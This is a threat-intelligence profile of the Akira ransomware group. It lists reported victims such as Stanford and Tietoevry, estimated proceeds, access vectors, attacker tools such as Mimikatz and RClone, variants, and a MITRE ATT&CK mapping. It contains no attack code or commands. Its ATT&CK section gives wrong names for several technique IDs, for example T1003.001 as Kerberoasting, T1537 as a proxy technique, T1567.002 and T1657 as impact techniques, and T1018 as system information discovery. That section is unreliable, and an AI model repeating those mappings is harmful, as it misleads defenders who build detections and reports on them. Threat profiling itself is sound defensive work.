Akira Ransomware: The Extortion Ghost in a Shell

Overview of Akira Ransomware:

• Active Threat: Akira is an active and prolific ransomware group operating globally.
• High-Profile Targets: Akira has targeted a range of organizations, including universities (Stanford), major IT service providers (Tietoevry), and numerous businesses across various sectors. Critical infrastructure, including healthcare systems, has also been impacted.
• Sophisticated Tactics: The group demonstrates the ability to exploit both known vulnerabilities (like CVE-2024-37085 in VMware ESXi) and leverage initial access vectors like Qakbot and credential theft to gain entry and deploy ransomware.
• Double Extortion: While not explicitly stated in all cases, the attacks suggest a potential double extortion model (data encryption and data exfiltration). The Stanford attack clearly involved data exfiltration.
• Evolving Techniques: Akira adapts its methods, employing different ransomware variants and targeting various systems (Windows and Linux). The use of the VMware ESXi vulnerability shows a shift towards targeting critical infrastructure components.
• Global Reach: Attacks have been observed in North America and Europe, indicating a wide geographical range of operations.

Known Aliases:

“Akira” is the only known documented alias of this malware.

Country of Origin:

Not known.

Most Recent Attacks:

• Stanford University (March 2024): Data of approximately 27,000 individuals was stolen, allegedly by Akira ransomware, impacting the Department of Public Safety network. The specific data compromised varied but could include sensitive information like Social Security numbers, driver’s license numbers, and in some cases, biometric data and credit card information.
• Australian Media Company: Akira Ransomware claims a cyber attack on defunct Australian media company Regency Media, stealing 16GB+ of data, highlighting the risk of unmanaged legacy data post-business closure.
• Tietoevry (January 2024): A ransomware attack affected a Swedish data center, causing widespread disruptions for numerous customers, including government agencies, universities, healthcare providers, and businesses such as Filmstaden (cinema chain), Rusta (discount retail), Moelven (building materials), and Grangnården (farming supplier). The attack impacted payroll, HR, and even healthcare record systems in some cases.
• Multiple Organizations (July 2024): Microsoft warned of active exploitation of the CVE-2024-37085 vulnerability in VMware ESXi by several ransomware groups, including those deploying Akira and Black Basta ransomware. A North American engineering firm was specifically mentioned as a victim in this context. This attack involved initial intrusion via Qakbot and credential theft, followed by exploitation of the ESXi vulnerability.

Recent Akira Ransomware Activity:

• Since March 2023, Akira ransomware has impacted a wide range of businesses and critical infrastructure entities across North America, Europe, and Australia.
• As of January 1, 2024, over 250 organizations were affected, resulting in approximately $42 million (USD) in ransomware proceeds.
• There is a shift in tactics in April 2023, with the deployment of a Linux variant targeting VMware ESXi virtual machines, expanding their attack surface beyond Windows systems.
• The most recent activity is from February 2024, based on FBI investigations. Specific victim names are not disclosed to protect their identities.

MITRE ATT&CK Tactics and Techniques of Akira Ransomware:

• Initial Access:
  • T1078: Valid Accounts (credential abuse)
  • T1190: Exploit Public-Facing Application (exploiting known Cisco vulnerabilities CVE-2020-3259 and CVE-2023-20269)
  • T1133: External Remote Services (RDP/VPN exploitation)
  • T1566.001: Phishing: Spearphishing Attachment
  • T1566.002: Phishing: Spearphishing Link
• Persistence:
  • T1136.002: Create Account (creating new domain accounts, including an administrative account named “itadm”)
• Privilege Escalation:
  • T1003: OS Credential Dumping (using Mimikatz and LaZagne)
  • T1003.001: OS Credential Dumping: LSASS Memory (Kerberoasting)
• Discovery:
  • T1016: System Network Configuration Discovery (using SoftPerfect and Advanced IP Scanner)
  • T1018: System Information Discovery (using net commands)
  • T1482: Domain Trust Discovery (using nltest)
• Defense Evasion:
  • T1562.001: Impair Defenses (disabling security software, using PowerTool to exploit Zemana AntiMalware driver)
• Credential Access:
  • T1003: OS Credential Dumping (using Mimikatz and LaZagne)
  • T1003.001: OS Credential Dumping: LSASS Memory (accessing credentials from LSASS memory)
• Exfiltration:
  • T1048: Exfiltration Over C2 Channel (using FileZilla, WinRAR, WinSCP, RClone)
  • T1537: External Proxy: Multi-stage Proxy (using AnyDesk, MobaXterm, RustDesk, Ngrok, Cloudflare Tunnel)
  • T1567.002: Data Encrypted for Impact
• Impact:
  • T1486: Data Encrypted for Impact (using Akira and Megazord ransomware variants)
  • T1490: Inhibit System Recovery (deleting Volume Shadow Copies)
  • T1657: Data Destruction
• Command and Control:
  • T1090.002: Proxy: Multi-stage Proxy (using various tools to establish C2 channels)

Common Methods of Infiltration:

The Akira ransomware group employs a multi-faceted approach to infiltration:

• Exploitation of vulnerabilities: Specifically targeting known vulnerabilities in Cisco VPNs (CVE-2020-3259 and CVE-2023-20269) and other publicly facing applications.
• Phishing: Using spear-phishing emails containing malicious attachments or links.
• Credential abuse: Exploiting compromised or stolen credentials to gain access.
• Remote access exploitation: Leveraging vulnerabilities in Remote Desktop Protocol (RDP) and Virtual Private Network (VPN) services.

Malware/Ransomware Strain(s):

• Akira: The primary ransomware variant, initially written in C++, encrypting files with the .akira extension. Later versions are also identified.
• Megazord: A Rust-based ransomware variant used interchangeably with Akira, encrypting files with the .powerranges extension.
• Akira_v2: A newer variant of the Akira ESXi encryptor, identified through third-party investigations, written in Rust and offering enhanced functionalities.